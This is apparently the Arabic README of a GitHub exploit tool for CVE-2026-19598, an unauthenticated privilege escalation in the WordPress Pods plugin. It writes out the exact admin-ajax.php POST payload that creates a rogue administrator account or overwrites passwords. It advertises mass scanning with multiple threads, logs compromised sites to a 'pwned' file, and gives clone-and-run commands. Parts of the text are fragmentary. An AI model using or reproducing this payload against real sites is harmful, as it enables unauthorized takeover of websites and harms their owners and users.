
يستغل ثغرة CVE-2026-19598 في إضافة Pods الخاصة بووردبريس لإنشاء حسابات مسؤول أو استبدال كلمات المرور عبر طلب AJAX غير مصادق عليه، مع دعم الفحص الجماعي وتعدد الخيوط.
تصعيد صلاحيات حرج غير مصادق عليه (CVSS 9.8) — إضافة Pods لووردبريس ≤ 3.3.9
تستغل هذه الأداة CVE-2026-19598، وهي ثغرة في إضافة Pods الخاصة بووردبريس تسمح للمهاجمين غير المصادق عليهم بإنشاء حسابات مدير جديدة أو استبدال كلمات مرور المستخدمين الحاليين عبر نقطة النهاية admin-ajax.php.
| الخاصية | القيمة |
|---|---|
| معرف CVE | CVE-2026-19598 |
| درجة CVSS | 9.8 (حرجة) |
| CWE | CWE-284 — تحكم غير صحيح في الوصول |
| المنتج المتأثر | إضافة Pods لووردبريس ≤ 3.3.9 |
| الإصدار المُصحَّح | 3.3.9.1 |
| المصادقة المطلوبة | لا (غير مصادق عليه) |
| الحالة | استغلال نشط |
توجد الثغرة في إجراء AJAX الخاص بـ pods_admin. بسبب عدم كفاية فحوصات الأذونات، يمكن استدعاء طريقة save_user دون مصادقة عندما يكون المعامل meta-box-loader موجودًا. وهذا يسمح للمهاجم بـ:
POST /wp-admin/admin-ajax.php action=pods_admin method=save_user meta-box-loader=1 user_login=evil_admin user_pass=Hacked123! role=administrator
يفشل الإضافة في التحقق من أن المستخدم الذي يرسل الطلب يمتلك الصلاحيات المناسبة، كما أن المعامل meta-box-loader يتجاوز فحوصات الأمان المقصودة.
pods_pwned.txt مع جميع الأهداف المستغلةrequests# استنساخ المستودع
git clone https://github.com/0xCyp1337/CVE-2026-19598.git
cd CVE-2026-19598
python3 CVE-2026-19598.py
# تثبيت التبعيات (مطلوب requests فقط)
pip install requests